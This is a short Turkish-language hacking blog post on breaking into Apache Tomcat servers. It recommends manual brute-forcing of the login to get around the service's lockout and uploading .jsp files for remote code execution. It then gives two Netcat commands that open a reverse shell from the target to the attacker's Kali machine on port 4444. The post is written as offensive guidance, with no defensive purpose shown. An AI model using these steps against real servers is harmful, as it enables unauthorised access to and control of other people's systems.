// Posted by :ROOTAYYILDIZ



Tomcat 8080/8180 portunda çalışan TCP bazlı bir servisdir.Tomcat saldırıları genelde küçük wordlistlerle gerçekleştirilir.Çünkü Tomcat servisi 15-20 giriş denemesinden sonra kendini 3-5 dakika arası kitler.Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır.
Tomcat servisine tarayıcı üzerinden erişilir.Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir.Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.
Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz.
Örnek Komutlar Aşağıdaki Gibidir:
Kali Linux’da terminali açıp şu komutu gireriz:
nc -l -v -p 4444
Uzaktaki komut satırımıza da şu komutu veriyoruz:
nc -e bin/bash “ip adresi” 4444
Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.

Leave a Reply

Subscribe to Posts | Subscribe to Comments

[ root ⚔ αyyιldιz ]